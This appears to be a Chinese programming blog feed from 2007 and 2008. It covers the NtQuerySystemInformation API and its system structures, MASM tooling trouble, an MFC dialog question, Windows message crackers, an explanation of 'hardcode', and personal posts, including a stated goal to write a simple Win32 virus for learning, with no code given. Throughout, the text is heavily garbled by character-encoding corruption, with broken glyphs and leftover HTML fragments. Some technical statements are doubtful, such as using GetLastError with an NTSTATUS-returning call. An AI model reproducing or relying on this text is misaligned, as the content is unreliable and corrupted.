今天�Q�我们主要讨论的是一个函数NtQuerySystemInformation(ZwQuerySystemInformation)。当�Ӟ��你不要小看这么一个函敎ͼ�它却为我们提供了丰富的系�l�信息，同时�q�包括对某些信息的控制和讄��。以下是�q�个函数的原型：

typedef NTSTATUS (__stdcall *NTQUERYSYSTEMINFORMATION)
(IN　　 SYSTEM_INFORMATION_CLASS SystemInformationClass,
IN OUT PVOID　　　　　　　　　　SystemInformation,
IN　　 ULONG　　　　　　　　　　SystemInformationLength,
OUT　　 PULONG　　　　　　　　 ReturnLength OPTIONAL)�Q?br>NTQUERYSYSTEMINFORMATION NtQuerySystemInformation�Q?br>

NtQuerySystemInformation�q�个函数有四个参敎ͼ�

�W�一个参数是dwRecordType�Q�这个参数指定了我们所查询的系�l�信息类型，��Z��查询�pȝ��HANDLE列表�Q�我们定义一个常�?define NT_HANDLE_LIST 16�Q�这个数值我是查资料得到的，如果谁有更详�l�的资料�Q�也误��我共享一下）�?/div>

�W�二个参数是一个指针，�q�个指针用来�q�回�pȝ��句柄列表�Q�在调用NtQuerySystemInformation函数之前�Q�必��Mؓ�q�个指针分配��_��的内存空��_��否则函数调用会出错�?/div>

�W�三个参数是指定你�ؓHandleList所分配的内存空间大��，单位是byte�?/div>

�W�四个参数是NtQuerySystemInformation�q�回的HandleList的大��；如果NtQuerySystemInformation函数调用成功�Q�返回值将�?�Q�否则可以��用GetLastError()获得详细的错误代码�?nbsp;

从中可以看到�Q�SystemInformationClass是一个类型信息，它大概提供了50余种信息�Q�也��是我们可以通过�q�个函数对大�U?0多种的系�l�信息进行探��或讄��。SystemInformation是一个LPVOID型的指针�Q�它为我们提供需要获得的信息�Q�或是我们需要设�|�的�pȝ��信息�?SystemInformationLength是SystemInformation的长度，它根据探��的信息�c�d��来决定。至�?ReturnLength则是�pȝ��q�回的需要的长度�Q�通常可以讄��为空指针(NULL)�?br>
首先�Q�我们来看看大家比较熟悉的系�l�进�E?�U�程相关的信息。这个题目在�|�上已经讨论了N多年了，所以我��׃��在老生常谈了，呵呵。那么就提出�q�个�l�构�c�d��的定义：

typedef struct _SYSTEM_PROCESSES
{
ULONG　　　　 NextEntryDelta�Q�　　　　 //构成�l�构序列的偏�U�量�Q?br>ULONG　　　　 ThreadCount�Q�　　　　　　 //�U�程数目�Q?br>ULONG　　　　 Reserved1[6]�Q�　　　　
LARGE_INTEGER CreateTime�Q�　　　　　　 //创徏旉��Q?br>LARGE_INTEGER UserTime�Q�　　　　　　　　//用户模式(Ring 3)的CPU旉��Q?br>LARGE_INTEGER KernelTime�Q�　　　　　　 //内核模式(Ring 0)的CPU旉��Q?br>UNICODE_STRING ProcessName�Q�　　　　　　 //�q�程名称�Q?br>KPRIORITY　　 BasePriority�Q�　　　　　　//�q�程优先权；
ULONG　　　　 ProcessId�Q�　　　　　　 //�q�程标识�W�；
ULONG　　　　 InheritedFromProcessId�Q?//父进�E�的标识�W�；
ULONG　　　　 HandleCount�Q�　　　　　　 //句柄数目�Q?br>ULONG　　　　 Reserved2[2]�Q?br>VM_COUNTERS　　VmCounters�Q�　　　　　　 //虚拟存储器的�l�构�Q�见下；
IO_COUNTERS　　IoCounters�Q�　　　　　　 //IO计数�l�构�Q�见下；
SYSTEM_THREADS Threads[1]�Q�　　　　　　 //�q�程相关�U�程的结构数�l�，见下�Q?br>}SYSTEM_PROCESSES,*PSYSTEM_PROCESSES�Q?br>
typedef struct _SYSTEM_THREADS
{
LARGE_INTEGER KernelTime�Q�　　　　　　 //CPU内核模式使用旉��Q?br>LARGE_INTEGER UserTime�Q�　　　　　　　　 //CPU用户模式使用旉��Q?br>LARGE_INTEGER CreateTime�Q�　　　　　　 //�U�程创徏旉��Q?br>ULONG　　　　 WaitTime�Q�　　　　　　　　 //�{�待旉��Q?br>PVOID　　　　 StartAddress�Q�　　　　　　 //�U�程开始的虚拟地址�Q?br>CLIENT_ID　　 ClientId�Q�　　　　　　　　 //�U�程标识�W�；
KPRIORITY　　 Priority�Q�　　　　　　　　 //�U�程优先�U�；
KPRIORITY　　 BasePriority�Q�　　　　　　 //基本优先�U�；
ULONG　　　　 ContextSwitchCount�Q�　　 //环境切换数目�Q?br>THREAD_STATE State�Q�　　　　　　　　　　//当前状态；
KWAIT_REASON WaitReason�Q�　　　　　　 //�{�待原因�Q?br>}SYSTEM_THREADS,*PSYSTEM_THREADS�Q?br>
typedef struct _VM_COUNTERS
{
ULONG PeakVirtualSize�Q�　　　　　　　　 //虚拟存储峰值大��；
ULONG VirtualSize�Q�　　　　　　　　　　 //虚拟存储大小�Q?br>ULONG PageFaultCount�Q�　　　　　　　　 //��|��障数目；
ULONG PeakWorkingSetSize�Q�　　　　　　 //工作集峰值大��；
ULONG WorkingSetSize�Q�　　　　　　　　 //工作集大��；
ULONG QuotaPeakPagedPoolUsage�Q�　　　　 //分页池��用配额峰��|��
ULONG QuotaPagedPoolUsage�Q�　　　　　　 //分页池��用配额；
ULONG QuotaPeakNonPagedPoolUsage�Q�　　 //非分��|��使用配额峰��|��
ULONG QuotaNonPagedPoolUsage�Q�　　　　 //非分��|��使用配额�Q?br>ULONG PagefileUsage�Q�　　　　　　　　　　//��|��件��用情况；
ULONG PeakPagefileUsage�Q�　　　　　　　　//��|��件��用峰��|��
}VM_COUNTERS,*PVM_COUNTERS�Q?br>
typedef struct _IO_COUNTERS
{
LARGE_INTEGER ReadOperationCount�Q�　　 //I/O��L��作数目；
LARGE_INTEGER WriteOperationCount�Q�　　 //I/O写操作数目；
LARGE_INTEGER OtherOperationCount�Q�　　 //I/O其他操作数目�Q?br>LARGE_INTEGER ReadTransferCount�Q�　　　　//I/O��L��据数目；
LARGE_INTEGER WriteTransferCount�Q�　　 //I/O写数据数目；
LARGE_INTEGER OtherTransferCount�Q�　　 //I/O其他操作数据数目�Q?br>}IO_COUNTERS,*PIO_COUNTERS�Q?br>
以上�q�些信息应该是比较全面的了，在Win32 API里�ؓ我们提供了PSAPI(�q�程状�?和ToolHelp32�q�两�U�探��系�l�进�E?�U�程信息的方式，在Windows2K/XP/2003都支持它们�?br>
现在�Q�我们来看看�pȝ��的性能信息�Q�性能�l�构SYSTEM_PERFORMANCE_INFORMATION为我们提供了70余种�pȝ��性能斚w��的信息，真是太丰富了�Q�请慢慢体会~

typedef struct _SYSTEM_PERFORMANCE_INFORMATION
{
LARGE_INTEGER IdleTime�Q�　　　　　　　　　　//CPU�I�闲旉��Q?br>LARGE_INTEGER ReadTransferCount�Q�　　　　 //I/O��L��作数目；
LARGE_INTEGER WriteTransferCount�Q�　　　　 //I/O写操作数目；
LARGE_INTEGER OtherTransferCount�Q�　　　　 //I/O其他操作数目�Q?br>ULONG　　　　 ReadOperationCount�Q�　　　　 //I/O��L��据数目；
ULONG　　　　 WriteOperationCount�Q�　　　　 //I/O写数据数目；
ULONG　　　　 OtherOperationCount�Q�　　　　 //I/O其他操作数据数目�Q?br>ULONG　　　　 AvailablePages�Q�　　　　　　 //可获得的��|��目；
ULONG　　　　 TotalCommittedPages�Q�　　　　 //��d��提交��|��目；
ULONG　　　　 TotalCommitLimit�Q�　　　　　　//已提交页数目�Q?br>ULONG　　　　 PeakCommitment�Q�　　　　　　 //��|��交峰��|��
ULONG　　　　 PageFaults�Q�　　　　　　　　 //��|��障数目；
ULONG　　　　 WriteCopyFaults�Q�　　　　　　 //Copy-On-Write故障数目�Q?br>ULONG　　　　 TransitionFaults�Q�　　　　　　//软页故障数目�Q?br>ULONG　　　　 Reserved1�Q?br>ULONG　　　　 DemandZeroFaults�Q�　　　　　　//需�?故障敎ͼ�
ULONG　　　　 PagesRead�Q�　　　　　　　　 //读页数目�Q?br>ULONG　　　　 PageReadIos�Q�　　　　　　　　 //读页I/O操作敎ͼ�
ULONG　　　　 Reserved2[2]�Q?br>ULONG　　　　 PagefilePagesWritten�Q�　　　　//已写��|��仉��敎ͼ�
ULONG　　　　 PagefilePageWriteIos�Q�　　　　//已写��|��件操作数�Q?br>ULONG　　　　 MappedFilePagesWritten�Q�　　 //已写映射文�g��|��Q?br>ULONG　　　　 MappedFileWriteIos�Q�　　　　 //已写映射文�g操作敎ͼ�
ULONG　　　　 PagedPoolUsage�Q�　　　　　　 //分页池��用；
ULONG　　　　 NonPagedPoolUsage�Q�　　　　 //非分��|��使用�Q?br>ULONG　　　　 PagedPoolAllocs�Q�　　　　　　 //分页池分配情况；
ULONG　　　　 PagedPoolFrees�Q�　　　　　　 //分页池释放情况；
ULONG　　　　 NonPagedPoolAllocs�Q�　　　　 //非分��|��分配情况�Q?br>ULONG　　　　 NonPagedPoolFress�Q�　　　　 //非分��|��释放情况�Q?br>ULONG　　　　 TotalFreeSystemPtes�Q�　　　　 //�pȝ��表��w��放��L��Q?br>ULONG　　　　 SystemCodePage�Q�　　　　　　 //操作�pȝ��代码��|��Q?br>ULONG　　　　 TotalSystemDriverPages�Q�　　 //可分��驱动程序页敎ͼ�
ULONG　　　　 TotalSystemCodePages�Q�　　　　//操作�pȝ��代码��|��L��Q?br>ULONG　　　　 SmallNonPagedLookasideListAllocateHits�Q?//��非分页侧视列表分配�ơ数�Q?br>ULONG　　　　 SmallPagedLookasideListAllocateHits�Q�　　//��分��侧视列表分配次敎ͼ�
ULONG　　　　 Reserved3�Q�　　　　　　　　
ULONG　　　　 MmSystemCachePage�Q�　　　　 //�pȝ��~�存��|��Q?br>ULONG　　　　 PagedPoolPage�Q�　　　　　　 //分页池页敎ͼ�
ULONG　　　　 SystemDriverPage�Q�　　　　 //可分��驱动页敎ͼ�
ULONG　　　　 FastReadNoWait�Q�　　　　　　 //异步快速读数目�Q?br>ULONG　　　　 FastReadWait�Q�　　　　　　 //同步快速读数目�Q?br>ULONG　　　　 FastReadResourceMiss�Q�　　 //快速读资源冲突敎ͼ�
ULONG　　　　 FastReadNotPossible�Q�　　　　//快速读��p�|敎ͼ�
ULONG　　　　 FastMdlReadNoWait�Q�　　　　 //异步MDL快速读数目�Q?br>ULONG　　　　 FastMdlReadWait�Q�　　　　　　//同步MDL快速读数目�Q?br>ULONG　　　　 FastMdlReadResourceMiss�Q�　　//MDL读资源冲�H�数�Q?br>ULONG　　　　 FastMdlReadNotPossible�Q�　　 //MDL��d��败数�Q?br>ULONG　　　　 MapDataNoWait�Q�　　　　　　 //异步映射数据�ơ数�Q?br>ULONG　　　　 MapDataWait�Q�　　　　　　　　//同步映射数据�ơ数�Q?br>ULONG　　　　 MapDataNoWaitMiss�Q�　　　　 //异步映射数据冲突�ơ数�Q?br>ULONG　　　　 MapDataWaitMiss�Q�　　　　　　//同步映射数据冲突�ơ数�Q?br>ULONG　　　　 PinMappedDataCount�Q�　　　　 //牵制映射数据数目�Q?br>ULONG　　　　 PinReadNoWait�Q�　　　　　　 //牵制异步��L��目；
ULONG　　　　 PinReadWait�Q�　　　　　　　　//牵制同步��L��目；
ULONG　　　　 PinReadNoWaitMiss�Q�　　　　 //牵制异步��d��H�数目；
ULONG　　　　 PinReadWaitMiss�Q�　　　　　　//牵制同步��d��H�数目；
ULONG　　　　 CopyReadNoWait�Q�　　　　　　 //异步拯��L��敎ͼ�
ULONG　　　　 CopyReadWait�Q�　　　　　　 //同步拯��L��敎ͼ�
ULONG　　　　 CopyReadNoWaitMiss�Q�　　　　 //异步拯��L��障次敎ͼ�
ULONG　　　　 CopyReadWaitMiss�Q�　　　　 //同步拯��L��障次敎ͼ�
ULONG　　　　 MdlReadNoWait�Q�　　　　　　 //异步MDL��L��敎ͼ�
ULONG　　　　 MdlReadWait�Q�　　　　　　　　//同步MDL��L��敎ͼ�
ULONG　　　　 MdlReadNoWaitMiss�Q�　　　　 //异步MDL��L��障次敎ͼ�
ULONG　　　　 MdlReadWaitMiss�Q�　　　　　　//同步MDL��L��障次敎ͼ�
ULONG　　　　 ReadAheadIos�Q�　　　　　　 //向前��L��作数目；
ULONG　　　　 LazyWriteIos�Q�　　　　　　 //LAZY写操作数目；
ULONG　　　　 LazyWritePages�Q�　　　　　　 //LAZY写页文�g数目�Q?br>ULONG　　　　 DataFlushes�Q�　　　　　　　　//�~�存��h��ơ数�Q?br>ULONG　　　　 DataPages�Q�　　　　　　　　 //�~�存��h��|��Q?br>ULONG　　　　 ContextSwitches�Q�　　　　　　//环境切换数目�Q?br>ULONG　　　　 FirstLevelTbFills�Q�　　　　 //�W�一层缓冲区填充�ơ数�Q?br>ULONG　　　　 SecondLevelTbFills�Q�　　　　 //�W�二层缓冲区填充�ơ数�Q?br>ULONG　　　　 SystemCall�Q�　　　　　　　　 //�pȝ��调用�ơ数�Q?br>}SYSTEM_PERFORMANCE_INFORMATION,*PSYSTEM_PERFORMANCE_INFORMATION�Q?br>
现在看到的是�l�构SYSTEM_PROCESSOR_TIMES提供的系�l�处理器的��用情况，包括各种情况下的使用旉��及中断数目：

typedef struct __SYSTEM_PROCESSOR_TIMES
{
LARGE_INTEGER IdleTime�Q�　　　　　　 //�I�闲旉��Q?br>LARGE_INTEGER KernelTime�Q�　　　　　　 //内核模式旉��Q?br>LARGE_INTEGER UserTime�Q�　　　　　　 //用户模式旉��Q?br>LARGE_INTEGER DpcTime�Q�　　　　　　　　//延迟�q�程调用旉��Q?br>LARGE_INTEGER InterruptTime�Q�　　　　 //中断旉��Q?br>ULONG　　　　 InterruptCount�Q�　　　　 //中断�ơ数�Q?br>}SYSTEM_PROCESSOR_TIMES,*PSYSTEM_PROCESSOR_TIMES�Q?br>
��|��件的使用情况�Q�SYSTEM_PAGEFILE_INFORMATION提供了所需的相关信息：

typedef struct _SYSTEM_PAGEFILE_INFORMATION
{
ULONG NetxEntryOffset�Q�　　　　　　　　//下一个结构的偏移量；
ULONG CurrentSize�Q�　　　　　　　　　　//当前��|��件大��；
ULONG TotalUsed�Q�　　　　　　　　　　 //当前使用的页文�g敎ͼ�
ULONG PeakUsed�Q�　　　　　　　　　　 //当前使用的页文�g峰值数�Q?br>UNICODE_STRING FileName�Q�　　　　　　 //��|��件的文�g名称�Q?br>}SYSTEM_PAGEFILE_INFORMATION,*PSYSTEM_PAGEFILE_INFORMATION�Q?br>
�pȝ��高速缓存的使用情况参见�l�构SYSTEM_CACHE_INFORMATION提供的信息：

typedef struct _SYSTEM_CACHE_INFORMATION
{
ULONG SystemCacheWsSize�Q�　　　　　　 //高速缓存大��；
ULONG SystemCacheWsPeakSize�Q�　　　　 //高速缓存峰值大��；
ULONG SystemCacheWsFaults�Q�　　　　　　//高速缓存页故障数目�Q?br>ULONG SystemCacheWsMinimum�Q�　　　　 //高速缓存最��页大小�Q?br>ULONG SystemCacheWsMaximum�Q�　　　　 //高速缓存最大页大小�Q?br>ULONG TransitionSharedPages�Q�　　　　 //�׃�n��|��目；
ULONG TransitionSharedPagesPeak�Q�　　 //�׃�n��峰值数目；
ULONG Reserved[2]�Q?br>}SYSTEM_CACHE_INFORMATION,*PSYSTEM_CACHE_INFORMATION�Q?

saga.constantine 2008-06-07 16:53 发表评论

saga.constantine — Sat, 12 Jan 2008 12:25:00 GMT

�|�上扄��UE的MASM语法着色文�Ӟ��链接不多�Q�所以上传提供一个下载�?br> 下蝲地址:http://www.shnenglu.com/Files/saga/MASM.rar
---------------saga.constantine

saga.constantine 2008-01-12 20:25 发表评论

[无奈]MASM32和kaspersky��是不兼容！谁知道解军_��法！

saga.constantine — Sat, 12 Jan 2008 03:52:00 GMT

      MASM32 v8.0至v9.0版本和卡巴斯�?.0�?.0版本�Q�貌似都不兼宏V�?img height=20 src="http://www.shnenglu.com/Emoticons/QQ/02.gif" width=20 border=0>
      MASM32无法安装�Q�上了MASM32的官方论坛看了，说是DEP�Q�数据执行保护）的原因，��在下个版本中解冟�?br>
      讄��排除�Q�关闭卡��_��或者是关闭DEP�Q�都是没有作用的�?img height=20 src="http://www.shnenglu.com/Emoticons/QQ/icon18.gif" width=25 border=0>
      卸蝲卡巴�Q�之后就可以安装了�?br>
      比较郁闷�Q�kav7.0本来是很不错的AV软�g。用�q�很多杀软。nod32�Q�norton�Q�avast�Q�macfee。除了macfee的溢��Z��护感觉很不错以�ؓ。还是觉得kav是最好��用的。真的不惛_��载�?br>      谁要是知道解��x��法。麻烦共享一下，谢�?img height=20 src="http://www.shnenglu.com/Emoticons/QQ/smile.gif" width=20 border=0>
                                             ------------saga.constantine

saga.constantine 2008-01-12 11:52 发表评论

[计划]学习�?008�l�自己定两个目标

saga.constantine — Thu, 10 Jan 2008 10:50:00 GMT

      今天不知道是心血来潮�q�是由来已久�Q�给自己定两个目标。目标应该就是具体的�Q?br>      目标一�Q�编写一个简单的WIN32病毒�E�序。（具体怎么��L��以后补充修改�Q�说明一下写�q�绝非恶意，只�ؓ学习�Q?br>      目标二：�~�写一个简单的加壳软�g。（具体�q�用什么技术，做出什么样�q�是以后补充。因为我也不知道�Q?br>
      我知道这��L��目标现实不现实，我只知道现实的我�~�Z��目标�?br>      2008�q�尾再来看看今天到底是不是冲动�?br>      如果没有实现�q�两个目标。我会很失望�?br>      如果实现了两个，我会�l�箋�q�求理想�?br>      如果只实��C��个，我会�?009�q�实现另一个。谁叫我�W�呢�Q?br>
                                                             ---------saga.constantine

saga.constantine 2008-01-10 18:50 发表评论

[�U�念]英雄---孟祥斌！

saga.constantine — Wed, 09 Jan 2008 02:14:00 GMT

                                                         真正的英�?-----孟祥斌！
      我们会记住你。你永远�z�d��我们心中。孟��斌大哥你一路走好�?br>
      敬礼�Q?br>
      事迹---11�?0日，��L��江金华某部司令部参谋、中��孟��斌为救一名蟩江自杀的年��d��子跃入冰��h��水中。轻生女救了上来�Q�他却没有上来。江边，来探亲的��d��和女儿在苦苦期盼奇迹发生�?br>
　　30日中�?1�?5分左叻I��金华市民熊女士正好在江边�z�衣服，无意间看到有个女子在岸边打电话，没说几句��把电话摔在��C��Q�脱掉鞋子蟩下江厅R��桥面上一个男青年看到�q�一�q�后�Q�马上脱掉衣服蟩江救人�?br>
　　�q�个�q�轻人正是孟��斌�Q�今�q?8岁，��L��江金华某部司令部参谋、中��?br>
　　没过多久�Q�孟��斌��将奛_��托出了水面，�q�处一艘摩托艇发现情况后也赶来救�h。就在摩托艇快要赶到的时候，孟祥斌开始下沉。摩托艇上的人将奛_��拉上来后�Q�再扑֭��斌�Q�已�l�找不到了�?br>
　　救援的小船不停地在江里搜寻，孟祥斌所在部队的官兵也赶来救��_��却始�l�没有发现孟��斌。直��C��?时半左右�Q�救援队�l�于发现了孟��斌�Q�赶紧送往医院急救�?br>
　　目睹和闻讯赶来的一些金华市民以及孟��斌的战友都在抢救室门口��祷�Q�但医院最后告知，孟祥斌已�l�牺牌Ӏ?br>
　　孟祥斌的��d��?岁的奛_��目睹了整个经�q�，她们眼睁睁看着孟祥斌沉入水底，自己却丝毫没有办法�?br>
　　孟祥斌的��d��_��q�几天，她和奛_��刚从江西老家赶来�Q�看望孟��斌�Q�当天是出来散步的，可没惛_��却发生了�q�样的事情�?br>
      孟祥斌救人牺牲的事迹�q�速传遍了金华�Q�自30日下午开始，��有许多金华市民涌往英雄遇难的婺江城南桥�Q�纷�U�送上花圈和鲜花。在城南桥上孟祥斌蟩江救人的栏杆边，早已有�h拉�v�?沉痛悼念英雄孟祥斌同�?的横�q�，在此�ȝ��悼念的市民络�l�不�l�，很快��引起了交通堵塞�?br>
　　1日中午，数百名孟��斌所在部队的官兵来到现场�Q�敬献了黄菊花，齐声高喊�Q?孟祥斌，我们来看你了�Q?接着�Q�向着横幅三鞠�w��?br>
　　�?日晚由金华新�ȝ��"新金华论�?发�v的烛光守灉|��动得��C��数千市民的响应。入夜，城南桥边的江堤上再次掀赯��悼的热潮。晚�?时不刎ͼ�摆在桥栏和江堤边的花圈已�l�连�l�|��癄��。数千市民自发点起了"风中之烛"�Q�默默地��祈��P��许多人随着烛光静静地流着眼泪�?br>
　　前往��奠的金华市民郑伟文��着眼泪��_��"孟祥斌救人的壮�D令�h感动�Q�我无法遏止悲痛�Q��ؓ英雄的英�q�早逝感到惋惜�?

　　有网友说�Q?英雄已逝，�_��长存。他的行为，�l�社会带来了一股清风：路见危难�Q�不讲得失，毫无畏惧�Q�挺�w�而出�Q�他用��I��珍�늚�勇气�Q�用自己宝贵的生命诠释了当代军�h报效�C�会�Q�报效�h民的崇高理想。在今天构徏�C�会��M��和谐�C�会的过�E�中�Q�时代呼唤这�U�行为，�C�会需要这�U�行为，更应该传承这�U�精��，孟祥斌同志是我们的光荣和骄傲�?
      报道取自人民�|��?br>                                                                       --------------saga.constantine

saga.constantine 2008-01-09 10:14 发表评论

saga.constantine — Mon, 31 Dec 2007 13:47:00 GMT

[�ȝ��]2007的最后一天，回顾一�q��?br>       2007�q�可以说是我正式工作的第一�q�。在��L��后的一�q�半的时间里��实是学��C��一些东西，但是说到自己的追求方面——编�E�。在�q�方面的�q�展实在是不能让自己满意�?br>       本命�q�即��过厅R��h��快25了。可是想惌��p��是没有取得成�l�。真是让自己很不爽。��^时自己常常在一些坛子里泡。可以发��C��些牛人，像白�q�方�Q�张��|��xyzreg�Q�，gyzy�Q�于渊，老罗�{�这��L��q�轻人都是有为青�q�。自�׃��他们的差距实在是太大。这是让我最痛苦的一件事之一�?br>       客观上自��p�v步比较晚�Q�高中时都不知道自己以后��要靠什么吃饭。上大学的时候又�׃��体制问题�Q��؜混度日，没能��h��。工作了才发现自己其实是喜欢�~�程的。对操作�pȝ��Q�对汇编�Q�对windows是有兴趣的。希望自��p��快点赶上�Q�需要学的东西实在是很多。而且�q�不能囫囵吞枣。我是自己学的，没有导师�Q�没有项目。我只能自己一步一步自己摸索。走别�h走过的�\。都没有人指引�?br>       我相信，只要坚持不懈的向前进。��L��一天自�׃��成�ؓ自己��x��为的人的。就��一直很�q�_��Q�是个小��的�~�程爱好者。我也不会后悔。因为我�q�求�q�。爱�q��?br>       �?007�q�的最后一天，�?007告别。迎�?008�Q�希望一�q�后自己在写�q�终感想的时候，不要像今天这��L��心情。我要给自己鼓劲。时间不�{��h。过�ȝ��已经�q�去。从2008�q�开始，一步一个脚印的��C��厅R��我会告诉自�׃��能急，万丈高楼�q�_��赗��基��对编�E�来说很重要。我也想用另外一句自己喜�Ƣ的台词来作�l�。不疯魔�Q�不成活——只有达到痴�q�L��境界才能��某事做到极致。�Q何事业的成功�Q�都需要全情的投入�?br>       saga go ahead!
      最后，�q�想感谢一下所有我的朋友，你们�l�了我快乐�?br>       感谢妈妈�Q�爸爸，及家��Z��Q�是你们抚养我成�ѝ��感谢女友慧慧陪在我的��n旁。虽然我有时会忍不住对你发脾气。你�q�是不离不弃�?br>       希望你们所有我所��q��人，�?008�q�里都是健康快乐的，那将是我最大的�q�福�Q?br>
                                                                 ---------------------saga.constantine

saga.constantine 2007-12-31 21:47 发表评论

[解释]“hardcode”是什么意思？

saga.constantine — Sat, 22 Dec 2007 07:47:00 GMT

今天看看雪的文章�Q�碰见hardcode一词不懂，查金�?007没有解释。网上找解释如下�Q?br>
hardcode----��编码�?br>所谓硬�~�码�Q�hardcode�Q�就是把一个本来应该（可以�Q�写到配�|�信息中的信息直接在�E�序代码中写��M��?

例如�Q�写了一个收发邮件的�E�序�Q�用户名�Q�密码，服务器地址�{�最好做成外部配�|�，
但是如果直接写死在程序代码中�Q�每�ơ改信息旉��要重新编译了……

�q�种�E�序不好�l�护�?nbsp;
一般懒的程序员或者初学者这�U�程序��量较大�?br>

在计��机�E�序或文本编辑中�Q�hardcode(�q�个词比hard code用�v来要频繁一�?是指��可变变量用一个固定值来代替的方法。用�q�种�Ҏ��~�译后，如果以后需要更�Ҏ��变量��非常困难了。大部分�E�序语言里，可以��一个固定数值定义�ؓ一个标讎ͼ�然后用这个特�D�标记来取代变量名称。当标记名称改变�Ӟ��变量名不变，�q�样�Q�当重新�~�译整个�E�序�Ӟ��所有变量都不再是固定��|��q�样��更�Ҏ��的实��C��改变变量的目的。尽��通过�~�辑器的查找替换功能也能实现整个变量名称的替换，但也很有可能出现多换或者少换的情况�Q�而在计算机程序中�Q��Q何小错误的出现都是不可饶恕的。最好的�Ҏ��是单独�ؓ变量名划分空��_��来实现这�U�变化，��如同前面说的那��P��需要改变的变量名暂时用一个定义好的标记名�U�来代替��是一�U�很好的�Ҏ��。通常情况下，都应该避免��用hardcode�Ҏ��。　　

有时也用hardcode来�Ş定w��些非帔R��学的语言�Q�比如C或者C++语言�Q�相对的�Q�用softcode来�Ş容象VB�q�类��单好用的�E�序语言�?

saga.constantine 2007-12-22 15:47 发表评论

[原创]PE文�g基本信息查看器及vc源码下蝲

saga.constantine — Tue, 18 Dec 2007 08:36:00 GMT

�q�些天学习PE文�g格式   写了此查看器�Q�功能很��单。欢�q�下载��用�?br>�E�序下蝲地址 www.shnenglu.com/files/saga/PEinfo.rar
vc源码下蝲地址   www.shnenglu.com/files/saga/PEinfocode.rar

                                                                                    --------------------saga.constantine

saga.constantine 2007-12-18 16:36 发表评论

saga.constantine — Thu, 06 Dec 2007 12:37:00 GMT

vc6�Q�徏立MFC对话框程序，�ȝ��口的InitInstance()里面�Q�运行SDK的API函数MessageBox()�Q�都无法看见弹出的窗口。如�Q?br>BOOL CMyText::InitInstance()
{
#ifdef _AFXDLL
Enable3dControls(); // Call this when using MFC in a shared DLL
#else
Enable3dControlsStatic(); // Call this when linking to MFC statically
#endif

          CMyTextDlg dlg;
          m_pMainWnd = &dlg;
          int nResponse = dlg.DoModal();
          if (nResponse == IDOK)
          {
                    // TODO: Place code here to handle when the dialog is
                    // dismissed with OK
            }
          else if (nResponse == IDCANCEL)
          {
           // TODO: Place code here to handle when the dialog is
           // dismissed with Cancel
           MessageBox(NULL,"haha","aa",MB_OK);   //不会出现
          }

          // Since the dialog has been closed, return FALSE so that we exit the
          // application, rather than start the application's message pump.
          return FALSE;
         }

上例中的MessageBox(),�q�行时一跌��过�Q�看不见�H�口。听的减弹出�H�口的声韟뀂不知道��Z��么，�|�上有�h提出分析�q�样的问题。其他窗口也无法生成。但是不知�ؓ何。一�U�解��x��法是注释掉m_pMainWnd = &dlg;�q�句卛_��正常。我试了�Q�的��如此！

那位高手或知之者�\�q�请解答�Q�谢�?

                                                                                                           ---------------------saga.constantine

saga.constantine 2007-12-06 20:37 发表评论

[转蝲]windows消息分流�?

saga.constantine — Tue, 04 Sep 2007 05:40:00 GMT

**转蝲**
自己看核心编�E�，�Ҏ��息分��器不太理解�Q�这��写的不错，所以�{载�?br>文章作者：�ƣ欣
原文链接�Q?a >http://blog.csdn.net/hopkins9961629/archive/2006/01/25/588184.aspx

很好理解,windows操作�pȝ��使用消息处理机制,那么,我们所设计的程序如何才能分辨和处理�pȝ��中的各种消息�?�q�就是消息分��器的作�?

��单来�?消息分流器就是一�D�代�?在我的讲�q�C��,��分7重来循序渐进的介�l�它.从最初的�W?重到最成熟的第7�?它的样子会有很大的变�?�?实现的功能都是一��L��,所不同�?仅仅是变得更加简�l��Ş�?

�E�序开始时�?会是main函数,然后会生成初始的�H�口,同时会调用WndProc函数.�q�是一个自定义的函�?名字也会有变�?但其功能是一��L��,��是�q�行消息分流�?WndProc函数如下:

LRESULT CALLBACK WndProc (HWND hwnd, UINT msg,WPARAM wParam, LPARAM lParam)
{

//......

return DefWindowProc(hwnd, msg, wParam, lParam);

}

�q�其�?hwnd是窗口的句柄,msg是系�l�发送来的消息的名字.wParam和lParam则是随消息一起发送来的消息参�?

WndProc函数使用了消息分��器�Q�下面把消息分流器的内容解释一下：

一重，当不同的消息出现�Ӟ��在其中写入相应的�E�序语句卛_��?br>LRESULT CALLBACK WndProc (HWND hwnd, UINT msg,WPARAM wParam, LPARAM lParam)
{
switch(msg)
{
  case WM_CREATE:
  // ...
  return 0;

  case WM_PAINT:
  // ...
  return 0;

  case WM_DESTROY:
  //...
  return 0;
}
return DefWindowProc(hwnd, msg, wParam, lParam);
}

二重�Q�运用三个消息分��器�q�行处理�?br>LRESULT CALLBACK WndProc (HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam)
{
switch(msg)
{
case WM_CREATE:
return HANDLE_WM_CREATE(hwnd, wParam, lParam, Cls_OnCreate);

case WM_PAINT:
return HANDLE_WM_PAINT(hwnd, wParam, lParam, Cls_OnPaint);

case WM_DESTROY:
return HANDLE_WM_DESTROY(hwnd, wParam, lParam, Cls_OnDestroy);
}
return DefWindowProc(hwnd, msg, wParam, lParam);
}
�q�里的HANDLE_WM_CREATE�Q�HANDLE_WM_PAINT�Q�HANDLE_WM_DESTROY��是消息分流器�?br>与消息不同之处就是在前面增加�?#8220;HANDLE_”字符�Q�windows的消息分��器��是�q�样的模栗��?br>它的本质��是宏定义�?br>其中的四个参数有三个都是从本函数的入口参��C��直接得到的，即�ؓhwnd, wParam, lParam�?br>只有�W�四的参数是表明调用的函数�?br>消息分流器是在winowsx.h文�g中定义的。由此，可以看出�W�四个参数是调用的函敎ͼ�其定义如下：

#define HANDLE_WM_CREATE(hwnd, wParam, lParam, fn) ((fn)((hwnd), (LPCREATESTRUCT)(lParam)) ? 0L : (LRESULT)-1L)

#define HANDLE_WM_PAINT(hwnd, wParam, lParam, fn) ((fn)(hwnd), 0L)

#define HANDLE_WM_DESTROYCLIPBOARD(hwnd, wParam, lParam, fn) ((fn)(hwnd), 0L)

0L是表�C�int�c�d��的变量，其数��gؓ0�?br>int�c�d��Ӟ��可在后面加l或者L(��写和大写�Ş�?
表明无符��h��Ӟ��可在后面加u或者U(��写和大写�Ş�?
float�c�d��Ӟ��可在后面加f或者F(��写和大写�Ş�?
例如�Q?br>128u 1024UL 1L 8Lu 3.14159F 0.1f

LRESULT是一个系�l�的数据�c�d��Q�其定义如下�Q?br>typedef LONG_PTR LRESULT;

LONG_PTR也是一个系�l�的数据�c�d��Q�其定义如下�Q?br>#if defined(_WIN64)
typedef __int64 LONG_PTR;
#else
typedef long LONG_PTR;
#endif
